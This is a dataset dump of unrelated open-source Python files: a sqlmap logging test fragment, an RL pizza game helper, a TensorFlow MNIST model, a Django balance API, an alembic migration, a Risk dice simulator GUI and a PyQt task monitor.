'_fixupParents', 'disable', 'emittedNoHandlerWarning',\n 'getLogger', 'loggerClass', 'loggerDict', 'root', 'setLoggerClass'],\n dir(logger.manager))\n self.assertEqual(True, logger.manager.loggerDict['sqlmapLog'] == logger)\n self.assertEqual(30, logger.manager.loggerDict['ClientForm'].getEffectiveLevel())\n self.assertEqual(0, logger.manager.loggerDict['ClientForm'].level)\n self.assertEqual(False, logger.manager.loggerDict['ClientForm'] == logger.root)\n # logging.filters\n self.assertEqual([], logger.filters)\n # ColorizingStreamHandler\n from thirdparty.ansistrm.ansistrm import ColorizingStreamHandler\n self.assertEqual(['__class__', '__delattr__', '__dict__', '__doc__',\n '__format__', '__getattribute__', '__hash__', '__init__',\n '__module__', '__new__', '__reduce__', '__reduce_ex__',\n '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__',\n '__weakref__', '_name', 'acquire', 'addFilter', 'close',\n 'color_map','colorize', 'createLock', 'csi', 'disable_coloring',\n 'emit', 'filter','filters', 'flush', 'format', 'formatter',\n 'get_name', 'handle', 'handleError', 'is_tty', 'level',\n 'level_map', 'lock', 'name', 'output_colorized', 'release',\n 'removeFilter', 'reset', 'setFormatter', 'setLevel',\n 'set_name', 'stream'], dir(logger.handlers[0]))\n self.assertEqual(True, logger.handlers[0].is_tty)\n # CRITICAL = 50\n # FATAL = CRITICAL\n # ERROR = 40\n # WARNING = 30 --default\n # WARN = WARNING\n # INFO = 20\n # DEBUG = 10\n # NOTSET = 0\n # LOGGER_HANDLER.level_map[logging.getLevelName(\"PAYLOAD\")] = (None, \"cyan\", False)\n # LOGGER_HANDLER.level_map[logging.getLevelName(\"TRAFFIC OUT\")] = (None, \"magenta\", False)\n # LOGGER_HANDLER.level_map[logging.getLevelName(\"TRAFFIC IN\")] = (\"magenta\", None, False)\n self.assertEqual({7: ('magenta', None, False),\n 40: (None, 'red', False),\n 9: (None, 'cyan', False),\n 10: (None, 'blue', False),\n 8: (None, 'magenta', False),\n 50: ('red', 'white', False),\n 20: (None, 'green', False),\n 30: (None, 'yellow', False)},\n logger.handlers[0].level_map)\n","sub_path":"test/koans/about_data.py","file_name":"about_data.py","file_ext":"py","file_size_in_byte":19848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"483985169","text":"# **************************************************************************** #\n# #\n# ::: :::::::: #\n# boards.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: jcruz-y- +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2019/02/26 19:19:52 by jcruz-y- #+# #+# #\n# Updated: 2019/02/27 18:56:14 by jcruz-y- ### ########.fr #\n# #\n# **************************************************************************** #\n\nimport random\nimport numpy as np\nimport src.game_b as game\n\n#r = random.randint(3, 1000)\n#c = random.randint(3, 1000)\n#l = random.randint(1, r/2) \n#minim_max = l * 2 \n#h = random.randint(minim_max, r)\n#R = 20\n#C = 20\nH = 6\nL = 2\n\nACTIONS = [\"right\", \"down\", \"left\", \"up\", \"cut_right\", \"cut_down\", \"cut_up\", \"cut_left\"]\n\ndef preprocess(state_dict):\n cursor_map = np.zeros(np.array(state_dict['ingredients_map']).shape)\n #flat_ing_map = np.array(state_dict['ingredients_map']).ravel()\n #ing_map_len = len(flat_ing_map)\n #ing_map_flat_extended = flat_ing_map + np.zeros(1000000 - ing_map_len)\n cursor_map[state_dict['cursor_position']] = 1\n state = np.concatenate((\n np.array(state_dict['ingredients_map']).ravel(),\n #ing_map_flat_extended,\n np.array(state_dict['slices_map']).ravel(),\n cursor_map.ravel(),\n [state_dict['slice_mode'],\n state_dict['min_each_ingredient_per_slice'],\n state_dict['max_ingredients_per_slice']],\n\t))\n return state.astype(np.float).ravel()\n\ndef rand_pizza(r, c):\n #h = random.randint(2, (r * c) // 5)\n #l = random.randint(1, 3)\n #r = random.randint(2, 1000)\n #c = random.randint(2, 1000)\n l = random.randint(1, r/2) \n minim_max = l * 2\n h = random.randint(minim_max, r)\n ing = ['T', 'M']\n pizza = []\n for _ in range(r):\n ls = []\n for _ in range(c):\n ls.append(ing[random.randint(0,1)])\n pizza.append(''.join(ls))\n return {'pizza_lines' : pizza, 'r' : r, 'c' : c, 'l' : l, 'h' : h}\n\n\ndef run_validation(PG, steps):\n env = game.Game({'max_steps': steps})\n R = 6\n C = 7\n h = 6\n l = 2\n pizza_lines = [\"TMMMTTT\",\"MMMMTMM\", \"TTMTTMT\", \"TMMTMMM\", \"TTTTTTM\", \"TTTTTTM\"]\n #pizza_lines = [\"TMTMTMT\",\"MTMTMTM\", \"TMTMTMT\", \"MTMTMTM\", \"TMTMTMT\", \"MTMTMTM\",\"TMTMTMT\"]\n pizza_config = {'pizza_lines': pizza_lines, 'r': R, 'c': C, 'l': l, 'h': h}\n state = env.init(pizza_config)[0] # np.zeros(OBSERVATION_DIM) #get only first value of tuple\n done = False\n acts = []\n for step in range(steps):\n state = preprocess(state)\n # 1. Choose an action based on observation\n action = PG.choose_action(state)\n\n # 2. Take action in the environment\n state_, reward, done, info = env.step(ACTIONS[action])\n acts.append(ACTIONS[action])\n state = state_\n print(acts)\n env.render()\n #game ends\n\n\n","sub_path":"pg_generic/boards.py","file_name":"boards.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"83375357","text":"import subprocess as sp\nimport os, os.path, sys\n\ndef evaluate(csv,w):\n if os.path.isfile(csv) & csv.endswith('.csv'):\n output = sp.check_output(['./a.out', csv, w])\n state_predicted = output.strip().split('\\n')[-1]\n print (state_predicted)\n\nif __name__ == '__main__':\n if len(sys.argv) == 3:\n evaluate(sys.argv[1], sys.argv[2])","sub_path":"evaluateCsv.py","file_name":"evaluateCsv.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"17520891","text":"import tensorflow as tf\n\nclass Model():\n def __init__(self, learning_rate, mnist, sess):\n self.sess = sess\n self.mnist = mnist\n self.x = tf.placeholder(tf.float32, [None, 784])\n W = tf.Variable(tf.zeros([784, 10]))\n b = tf.Variable(tf.zeros([10]))\n self.y = tf.nn.softmax(tf.matmul(self.x, W) + b)\n self.y_ = tf.placeholder(tf.float32, [None, 10])\n self.cross_entropy = tf.reduce_mean(\n -tf.reduce_sum(self.y_ * tf.log(self.y), reduction_indices=[1]))\n self.train_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(self.cross_entropy)\n correct_prediction = tf.equal(tf.argmax(self.y, 1), tf.argmax(self.y_, 1))\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n self.test_sum_cross_entropy = tf.summary.scalar(\"test.cross_entropy\",\n self.cross_entropy)\n self.test_sum_acc = tf.summary.scalar(\"test.accuracy\", self.accuracy)\n tf.global_variables_initializer().run()\n\n def train(self, minibatch_size):\n mnist = self.mnist\n batch_xs, batch_ys = mnist.train.next_batch(minibatch_size)\n # take a train step:\n self.sess.run(self.train_step, feed_dict={self.x: batch_xs,\n self.y_: batch_ys})","sub_path":"papers/klaus_greff/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"365784580","text":"from drf_yasg.utils import swagger_auto_schema\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom .exceptions import UserDoesNotExist, NegativePoints, ZeroPoints\nfrom .models import Balance\nfrom .serializers import BalanceSerializer\n\n\nclass Balances(APIView):\n \"\"\"Increase or decrease user points\"\"\"\n @swagger_auto_schema(request_body=BalanceSerializer(), responses={201: 'Success.'})\n def post(self, request, format=None):\n serializer = BalanceSerializer(data=request.data)\n\n if serializer.is_valid():\n user_id = request.data.get('user_id')\n points = request.data.get('points')\n\n if points < 0:\n balance = Balance.objects.points_sum(user_id=user_id)\n # Check if residual balance negative\n if balance is None:\n raise UserDoesNotExist()\n if (balance + points) < 0:\n raise NegativePoints()\n serializer.save()\n elif points == 0:\n raise ZeroPoints()\n else:\n # If incoming points are positive, simply store them\n serializer.save()\n return Response({'detail': \"Success.\"}, status=201)\n else:\n return Response(serializer.errors, status=400)\n\n\nclass UserBalance(APIView):\n \"\"\"Return user balance by user_id\"\"\"\n def get(self, request, user_id, format=None):\n balance = Balance.objects.points_sum(user_id=user_id)\n\n if balance and balance >= 0:\n jdata = {'balance': balance}\n return Response(jdata, status=200)\n else:\n raise UserDoesNotExist()\n","sub_path":"services/balances/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"106062453","text":"# Copyright 2018 OpenStack Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\n\"\"\"Update tenant_id type from uuid to text\n\nRevision ID: 644faa4491fd\nRevises: 4da82e1c11c8\nCreate Date: 2018-10-29 17:25:37.901136\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '644faa4491fd'\ndown_revision = '4da82e1c11c8'\n\nfrom alembic import op # noqa: E402\nimport sqlalchemy as sa # noqa: E402\n\n\nCONSTRAINT_MAP = {\n 'hashmap_mappings': {\n 'uniq_field_mapping': (\n ['value', 'field_id', 'tenant_id'],\n ['value', 'field_id']),\n 'uniq_service_mapping': (\n ['value', 'service_id', 'tenant_id'],\n ['value', 'service_id'])},\n 'hashmap_thresholds': {\n 'uniq_field_threshold': (\n ['level', 'field_id', 'tenant_id'],\n ['level', 'field_id']),\n 'uniq_service_threshold': (\n ['level', 'service_id', 'tenant_id'],\n ['level', 'service_id'])}}\n\n\ndef get_reflect(table):\n reflect_args = [\n sa.Column(\n 'service_id',\n sa.Integer,\n sa.ForeignKey(\n 'hashmap_services.id',\n ondelete='CASCADE',\n name='fk_{}_service_id_hashmap_services'.format(table)),\n nullable=True),\n sa.Column(\n 'field_id',\n sa.Integer,\n sa.ForeignKey(\n 'hashmap_fields.id',\n ondelete='CASCADE',\n name='fk_{}_field_id_hashmap_fields'.format(table)),\n nullable=True),\n sa.Column(\n 'group_id',\n sa.Integer,\n sa.ForeignKey(\n 'hashmap_groups.id',\n ondelete='SET NULL',\n name='fk_{}_group_id_hashmap_groups'.format(table)),\n nullable=True),\n sa.Column(\n 'map_type',\n sa.Enum(\n 'flat',\n 'rate',\n name='enum_{}map_type'.format(\n 'hash' if table == 'hashmap_thresholds' else ''),\n create_constraint=True),\n nullable=False)]\n return reflect_args\n\n\ndef upgrade():\n for table in ('hashmap_mappings', 'hashmap_thresholds'):\n with op.batch_alter_table(\n table,\n reflect_args=get_reflect(table)\n ) as batch_op:\n batch_op.alter_column('tenant_id',\n type_=sa.String(length=255),\n existing_nullable=True)\n for name, columns in CONSTRAINT_MAP[table].items():\n batch_op.drop_constraint(name, type_='unique')\n batch_op.create_unique_constraint(name, columns[0])\n","sub_path":"cloudkitty/rating/hash/db/sqlalchemy/alembic/versions/644faa4491fd_update_tenant_id_type_from_uuid_to_text.py","file_name":"644faa4491fd_update_tenant_id_type_from_uuid_to_text.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"582395560","text":"#!/usr/bin/python\r\n# -*- coding: UTF-8 -*-\r\n\r\nimport re\r\n\r\n# 分段\r\ndef splitSentence(paragraph):\r\n #tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\r\n sentences = paragraph.split(\"\\n\")\r\n return sentences\r\n\r\nf1 = open ('京华烟云.txt', 'r',encoding='utf-8')\r\nstr1 = f1.read()\r\nsentences = splitSentence(str1)\r\nf1.close ()\r\n\r\nfor sentence in sentences:\r\n if ((\"木兰\"in sentence) and (\"荪亚\"in sentence)and (\"“\"in sentence)):\r\n a = sentence.find(\"木兰\")\r\n b = sentence.find(\"荪亚\")\r\n c = sentence.find(\"“\")\r\n if (a < c and b < c):\r\n if (c - min(a,b) < 20):\r\n print (sentence)\r\n\r\n\r\n","sub_path":"simple/novel.py","file_name":"novel.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"397433099","text":"#!/usr/bin/env python\nimport rospy\nfrom gazebo_msgs.msg import ModelState\nfrom geometry_msgs.msg import Pose \n\nx = -1.367482\ny = 9.310670\nz = 0.449995\n\ncurrent_x = 0.858947\ncurrent_y = 5.998969\ncurrent_z = 0.449984\n\ntarget_model_name = \"husky\"\nrospy.init_node(\"p2p_move\", anonymous=True)\npub = rospy.Publisher(\"/gazebo/set_model_state\", ModelState, queue_size=10)","sub_path":"scripts/move_ugv_demo.py","file_name":"move_ugv_demo.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"129925250","text":"#import tkinter as tk\n#import Canvas\nimport random\nimport matplotlib.pyplot as plt \nimport tkinter as tk\nimport tkinter.messagebox\nimport numpy as np\n#import pygame\n#import tkinter as tk\n\nfrom matrix2 import *\nfrom risk_simulator import *\nfrom time_pass import *\n#def getBattles():\n#\tattacker=7\n\n#\tdefender=6\n\n#\tno_of_battles=0\n\n#\twhile (attacker!=0 and defender!=0):\n#\t\taturn = random.choice([1,2,3,4,5,6])\n#\t\tdturn = random.choice([1,2,3,4,5,6])\n#\t\tif aturn>dturn:\n#\t\t\tdefender=defender-1\n#\t\telse:\n#\t\t\tattacker=attacker-1\n#\t\tno_of_battles=no_of_battles+1\n\n#\tif(attacker==0):\n#\t\treturn no_of_battles,0,1\n#\telse:\n#\t\treturn no_of_battles,1,0\n\n\ndef plotter():\n\tif inp.get()=='':\n\t\ttkMessageBox.showerror(\"Error\",\"Please enter No of Iterations!!!!\")\n\t\treturn\n\tprint(inp.get())\n\tprint(type(inp.get()))\n\n\tif inpa.get()=='':\n\t\ttkMessageBox.showerror(\"Error\",\"Please enter No of Attackers!!!!\")\n\t\treturn\n\tif inpd.get()=='':\n\t\ttkMessageBox.showerror(\"Error\",\"Please enter No of Defenders!!!!\")\n\t\treturn\n\n\tmax_no_of_iterations=inp.get()\n\tattack=inpa.get()\n\tdefend=inpd.get()\n\n\tattack=int(attack)\n\tdefend=int(defend)\n\tmax_no_of_iterations=int(max_no_of_iterations)\n\tx=[]\n\ty=[]\n\tfor i in range(1,max_no_of_iterations+1,1):\n\t\tans=0\n\t\tfor j in range(1,i+1,1):\n\t\t\tnum,a,d=getBattles(attack,defend)\n\t\t\tans=ans+num\n\t\tans=float(ans)/i\n\t\tx.append(i)\n\t\ty.append(ans)\n # plotting the points \n\tnum,v,b=theoretical_dynamic(attack,defend)\n\tplt.plot(x, y , label = 'Simulated no. of battles')\n\t#plt.legend(['Simulated no. of battles']) \n\tplt.axhline(y=num, color='r', linestyle='-',label=\"Theoretical battles\")\n\tleg = plt.legend();\n\t# naming the x axis \n\tplt.xlabel('NO OF ITERATIONS') \n\t# naming the y axis \n\tplt.ylabel('SIMULATED BATTLES') \n\n\t# giving a title to my graph \n\tplt.title('SIMULATED BATTLES V/S NO OF ITERATIONS')\n\t# function to show the plot \n\tplt.show()\n\n\n#print(getBattles())\n\ndef plotter1():\n\tif inp1.get()=='':\n\t\ttkMessageBox.showerror(\"Error\",\"Please enter No of Iterations!!!!\")\n\t\treturn\n\tprint(inp1.get())\n\tprint(type(inp1.get()))\n\tif inpa.get()=='':\n\t\ttkMessageBox.showerror(\"Error\",\"Please enter No of Attackers!!!!\")\n\t\treturn\n\tif inpd.get()=='':\n\t\ttkMessageBox.showerror(\"Error\",\"Please enter No of Defenders!!!!\")\n\t\treturn\n\tmax_no_of_iterations=inp1.get()\n\tmax_no_of_iterations=int(max_no_of_iterations)\n\n\tattack=inpa.get()\n\tdefend=inpd.get()\n\tattack=int(attack)\n\tdefend=int(defend)\n\tx=[]\n\ty1=[]\n\ty2=[]\n\tfor i in range(1,max_no_of_iterations+1,1):\n\t\tans=0\n\t\tawin=0\n\t\tbwin=0\n\t\tfor j in range(1,i,1):\n\t\t\tres,a,d=getBattles(attack,defend)\n\t\t\tans=ans+res\n\t\t\tawin=awin+a\n\t\t\tbwin=bwin+d\n\t\tx.append(i)\n\t\ty1.append(float(awin)/i)\n\t\ty2.append(float(bwin)/i)\n\t\n\tnum,v,b=theoretical_dynamic(attack,defend)\n\tplt.plot(x, y1 , label = 'Attacker Probability')\n\t#plt.legend(['Attacker Probability'])\n\tplt.plot(x, y2 , label = 'Defender Probability') \n\t#plt.legend(['Defender Probability'])\n\tplt.axhline(y=v, color='k', linestyle='--',label=\"Theoretical attacker win Probability\")\n\tplt.axhline(y=b, color='r', linestyle='--',label=\"Theoretical defender win Probability\")\n\tleg = plt.legend();\n\t# naming the x axis \n\tplt.xlabel('NO OF ITERATIONS') \n\t# naming the y axis \n\tplt.ylabel('SIMULATED PROBABILITIES') \n\n\t# giving a title to my graph \n\tplt.title('SIMULATED PROBABILITIES V/S NO OF ITERATIONS')\n\tplt.legend\n\t# function to show the plot \n\tplt.show()\n\n\nroot = tk.Tk()\nlogo = tk.PhotoImage(file=\"risk_image.gif\")\nlogo=logo.subsample(3)\nw1 = tk.Label(root, image=logo).pack(side=\"top\")\nroot.title(\"Risk Simulator\")\nroot.geometry(\"600x500\")\ntextbox=\"No of simulations:\"\n\nans,prob_attackers,prob_defender=theoretical_values()\n\ntb1 = \"\"\"Expected number of battles(theoretical):\"\"\" + str(ans)\n#print(\"Expected number of steps simulated:\"+str(num))\n\ntb2=\"Enter number of simulations:\"\n\n\ntb3=\"Enter number of iterations for Probability:\"\n\ntb4=\"Enter no. of attackers:\"\n\ntb5=\"Enter no. of defenders:\"\n\nwa = tk.Label(root, \n justify=tk.LEFT,\n padx = 10, \n text=tb4,fg=\"green\",font=2).place(x=10,y=250)\ninpa=tk.StringVar()\nea = tk.Entry(root,textvariable=inpa,width=4).place(x=200,y=250)\n\n\nwd = tk.Label(root, \n justify=tk.LEFT,\n padx = 10, \n text=tb5,fg=\"green\",font=2).place(x=250,y=250)\ninpd=tk.StringVar()\ned = tk.Entry(root,textvariable=inpd,width=4).place(x=450,y=250)\n\n\n#wtext = tk.Label(root, \n # justify=tk.LEFT,\n # padx = 10, \n # text=tb1,fg=\"blue\",font=2).place(x=10,y=290)\n\nwtext1 = tk.Label(root, \n justify=tk.LEFT,\n padx = 10, \n text=tb2,fg=\"red\",font=2).place(x=10,y=330)\n\ninp=tk.StringVar()\ne1 = tk.Entry(root,textvariable=inp,width=8).place(x=270,y=330)\n\n\nplot_getter = tk.Button(root, text=\"Get Plot\", command=plotter).place(x=350,y=330) \n\n\nwtextw = tk.Label(root, \n justify=tk.LEFT,\n padx = 10, \n text=tb3,fg=\"orange\",font=2).place(x=10,y=400)\n\ninp1=tk.StringVar()\ne2 = tk.Entry(root,textvariable=inp1,width=8).place(x=370,y=400)\n\n\nplot_getter1 = tk.Button(root, text=\"Plot Probability\", command=plotter1).place(x=450,y=400)\n\n\nroot.mainloop()","sub_path":"Risk/risk.py","file_name":"risk.py","file_ext":"py","file_size_in_byte":5133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"58965821","text":"import json\nimport logging\nimport logging.config\nfrom datetime import datetime\n\nimport boto3\nimport watchtower\n\nimport etl.monitor\nfrom etl.config import get_config_value\nfrom etl.logs.formatter import JsonFormatter\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n\ndef add_cloudwatch_logging(prefix) -> None:\n session = boto3.session.Session()\n log_group = get_config_value(\"arthur_settings.logging.cloudwatch.log_group\")\n now = datetime.utcnow()\n stream_name = f\"{prefix}/{now.year}/{now.month}/{now.day}/{etl.monitor.Monitor.etl_id}\"\n\n logger.info(f\"Starting logging to CloudWatch stream '{log_group}/{stream_name}'\")\n handler = watchtower.CloudWatchLogHandler(\n boto3_session=session,\n log_group=log_group,\n log_group_retention_days=180,\n send_interval=10,\n stream_name=stream_name,\n )\n\n log_level = get_config_value(\"arthur_settings.logging.cloudwatch.log_level\")\n handler.setLevel(log_level)\n # The extra \"str()\" gets around the meta class approach to store the etl_id.\n handler.setFormatter(JsonFormatter(prefix, str(etl.monitor.Monitor.etl_id)))\n\n root_logger = logging.getLogger()\n root_logger.addHandler(handler)\n\n\ndef tail(prefix: str, start_time: datetime) -> None:\n client = boto3.client(\"logs\")\n log_group = get_config_value(\"arthur_settings.logging.cloudwatch.log_group\")\n logger.info(f\"Searching log streams '{log_group}/{prefix}/*' (starting at '{start_time})'\")\n\n paginator = client.get_paginator(\"filter_log_events\")\n response_iterator = paginator.paginate(\n logGroupName=log_group,\n logStreamNamePrefix=prefix,\n startTime=int(start_time.timestamp() * 1000.0),\n )\n for response in response_iterator:\n for event in response[\"events\"]:\n stream_name = event[\"logStreamName\"]\n message = json.loads(event[\"message\"])\n print(f\"{stream_name} {message['gmtime']} {message['log_level']} {message['message']}\")\n","sub_path":"python/etl/logs/cloudwatch.py","file_name":"cloudwatch.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"171444830","text":"from app import app\nfrom flask import (request, g, render_template)\n\nimport ranker\nimport nextbus.nextbus as nextbus\n\n@app.route('/', methods=['GET', 'POST'])\ndef pathfinder():\n\tuse_socket = False\n\tg.pathfinder_done = None;\n\tg.valid_out = None;\n\tif request.method == 'POST':\n\t\tg.pathfinder_done = 1\n\n\t\torigin = request.form['origin']\n\t\tdest = request.form['dest']\n\t\tdepart_in = request.form['minleaving']\n\t\twalk_speed = request.form['walkspeed']\n\n\t\tif use_socket:\n\t\t\thost = 'localhost'\n\t\t\tport = 9876\n\t\t\tbufsize = 4096\n\n\t\t\ttry:\n\t\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\t\t\ts.connect((host, port))\n\t\t\t\ts.sendall(\"%s\\n%s\\n%s\\n%s\" % (origin, dest, depart_in, walk_speed))\n\t\t\t\tresult = s.recv(4096)\n\t\t\texcept:\n\t\t\t\ttraceback.print_exc()\n\t\t\t\tresult = \"Error getting results from pathfinder VM\"\n\n\t\telse:\n\t\t\tresult = ranker.pathRanker(origin, dest, float(depart_in)*60, float(walk_speed))\n\n\t\tif (result != ranker.INVALID_REQUEST):\n\t\t\tg.valid_out = 1\n\t\t\twaypoints = result.split(\";\")\n\t\t\tresult = waypoints.pop(0)\n\t\t\tresult = result.replace(\"\\n\", \"
    \")\n\t\t\tg.direction_string = \"&origin=\" + origin.replace(\" \", \"+\") + \"&destination=\" + dest.replace(\" \", \"+\")\n\t\t\tg.waypoints_string = \"&waypoints=\"\n\t\t\tfor waypoint in waypoints:\n\t\t\t\tif waypoint != waypoints[0]:\n\t\t\t\t\tg.waypoints_string += \"|\"\n\t\t\t\tg.waypoints_string += waypoint.replace(\" \", \"+\")\n\t\t# append TTC service alert\n\t\talert = nextbus.Alert.getAlerts().replace(\"\\n\", \"
    \")\n\t\tg.pathfinder_out = result + '

    Service Alerts:

    ' + alert\n\n\treturn render_template('index.html')\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"255822879","text":"\"\"\"\nTask Monitor window\n\nBrowses:\n - Running agents, allowing to reinitiate or finish an agent execution\n - Threads, browsing only\n\n\"\"\"\n\n__all__ = [\"XTPMonitor\"]\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport os\nimport ui_XTPMonitor\nfrom alavan.misc import fileutil\nfrom alavan import misc\nfrom alavan import mainSys\n\n\ntry:\n _fromUtf8 = QString.fromUtf8\nexcept AttributeError:\n _fromUtf8 = lambda s: s\n\n\nM_PROCESS = 0\nM_THREAD = 1\n\nclass XTPMonitor(QMainWindow, ui_XTPMonitor.Ui_XTPMonitor):\n def __init__(self, parent=None):\n QMainWindow.__init__(self, parent)\n self.setupUi(self)\n self.InitializeUI0()\n\n self.currentProcess = None\n self.currentThread = None\n #self.resize(1, 1) # As small as possible!\n\n\n def InitializeUI0(self):\n\n a = [self.tableWidgetProcess, self.tableWidgetThread]\n for t in a:\n t.setAlternatingRowColors(True)\n t.setEditTriggers(QTableWidget.NoEditTriggers)\n\n self.fileObserver = fileutil.FileObserver()\n self.fileObserver.minInterval = 0.25\n self.fileObserver.FileChanged.connect(self.on_FileChanged, Qt.QueuedConnection)\n self.fileObserver.start()\n\n mainSys().pm.WorkersChanged.connect(self.on_ProcessesChanged, Qt.QueuedConnection)\n mainSys().tm.WorkersChanged.connect(self.on_ThreadsChanged, Qt.QueuedConnection)\n #mainSys().ProcessLogAdded.connect(self.on_ProcessLogAdded)\n\n\n def GetMode(self):\n \"\"\"Returns M_PROCESS or M_THREAD.\"\"\"\n return self.tabWidget.currentIndex()\n\n def GetCurrentTask(self):\n \"\"\"Returns either a process or a thread, or None.\"\"\"\n return self.currentProcess if self.GetMode() == M_PROCESS \\\n else self.currentThread\n\n ############################################################################\n ## SLOTS\n\n def on_ProcessesChanged(self):\n self.PopulateProcesses()\n\n def on_ThreadsChanged(self):\n self.PopulateThreads()\n\n def on_FileChanged(self, fns):\n fns = self.fileObserver.filenames\n if fns and os.path.exists(fns[0]):\n with file(fns[0]) as f:\n if self.checkBoxTail.isChecked():\n s = misc.tail(f, self.spinBoxTailSize.value())\n else:\n s = f.read()\n else:\n s = \"Nothing to display yet\"\n te = self.textEditLog\n te.setText(s)\n te.moveCursor(QTextCursor.End)\n\n @pyqtSignature(\"\")\n def on_pushButtonRefresh_clicked(self):\n if self.GetMode() == M_PROCESS:\n self.PopulateProcesses()\n else:\n self.PopulateThreads()\n\n @pyqtSignature(\"\")\n def on_pushButtonReload_clicked(self):\n self.on_FileChanged([])\n\n @pyqtSignature(\"\")\n def on_pushButtonPutMessage_clicked(self):\n obj = self.GetCurrentTask()\n if obj is not None:\n try:\n token = str(self.lineEditPToken.text())\n sData = str(self.lineEditPData.text())\n if len(sData) == 0 or sData.isspace():\n data = True\n else:\n data = eval(sData)\n obj.PutMessage(token, data)\n except Exception as E:\n QMessageBox.critical(self, \"Send message\", E.message)\n raise\n else:\n QMessageBox.warning(self, \"No task selected\", \"No process/thread selected\")\n\n @pyqtSignature(\"\")\n def on_pushButtonExit_clicked(self):\n obj = self.GetCurrentTask()\n if obj is not None:\n obj.Exit()\n\n @pyqtSignature(\"QTableWidgetItem*, QTableWidgetItem*\")\n def on_tableWidgetProcess_currentItemChanged(self, curr, prev):\n self.UpdateCurrentProcess(curr)\n\n @pyqtSignature(\"QTableWidgetItem*, QTableWidgetItem*\")\n def on_tableWidgetThread_currentItemChanged(self, curr, prev):\n self.UpdateCurrentThread(curr)\n\n @pyqtSignature(\"int\")\n def on_tabWidget_currentChanged(self, index):\n if index == M_PROCESS:\n self.PopulateProcesses()\n else:\n self.PopulateThreads()\n\n def closeEvent(self, event):\n self.fileObserver.Exit()\n\n ############################################################################\n\n def PopulateTableWidget(self, pp, t):\n \"\"\"\n :param pp: list of workers\n :param t: table widget\n \"\"\"\n n = len(pp)\n t.clear()\n t.sortItems(-1)\n t.setRowCount(n)\n t.setColumnCount(3)\n t.setHorizontalHeaderLabels([\"Name\", \"Class\", \"Time registered\"])\n for (i, (worker, data)) in enumerate(pp.iteritems()):\n item = QTableWidgetItem(worker.name)\n t.setItem(i, 0, item)\n item = QTableWidgetItem(worker.__class__.__name__)\n t.setItem(i, 1, item)\n item = QTableWidgetItem(data.timeStarted.strftime(\"%Y/%m/%d %H:%M\"))\n # item.setTextAlignment(Qt.AlignCenter)\n t.setItem(i, 2, item)\n t.resizeColumnsToContents()\n if n > 0:\n t.setCurrentCell(0, 0)\n\n def PopulateProcesses(self):\n pp = mainSys().pm.workerInfoByWorker\n t = self.tableWidgetProcess\n self.PopulateTableWidget(pp, t)\n if len(pp) > 0:\n self.UpdateCurrentProcess()\n\n def PopulateThreads(self):\n tt = mainSys().tm.workerInfoByWorker\n t = self.tableWidgetThread\n self.PopulateTableWidget(tt, t)\n if len(tt) > 0:\n self.UpdateCurrentThread()\n\n def UpdateLogFile(self, curr, monitor, t):\n \"\"\"\n :param curr: I am not sure\n :param monitor: TPMonitor\n :param t: table widget\n\n Returns a worker object or None\n \"\"\"\n if curr is None:\n items = t.selectedItems()\n if len(items) > 0:\n curr = items[0]\n else:\n curr = t.item(curr.row(), 0) # Gets item of first column instead\n if curr is not None:\n name = curr.data(0).toPyObject()\n worker, _ = monitor.worker_GetByName(name)\n self.labelFilename.setText(worker.logFilename)\n self.pushButtonReload.setEnabled(True)\n self.fileObserver.SetFilenames([worker.logFilename])\n self.on_FileChanged([])\n return worker\n return None\n\n def UpdateCurrentProcess(self, curr=None):\n \"\"\"Updates internal and GUI status after current process has changed.\n\n curr is passed from currentItemChanged, because the signal is emitted\n before the item has internally changed.\"\"\"\n t = self.tableWidgetProcess\n monitor = mainSys().pm\n self.currentProcess = self.UpdateLogFile(curr, monitor, t)\n\n def UpdateCurrentThread(self, curr=None):\n \"\"\"Updates internal and GUI status after current Thread has changed.\n\n curr is passed from currentItemChanged, because the signal is emitted\n before the item has internally changed.\"\"\"\n t = self.tableWidgetThread\n monitor = 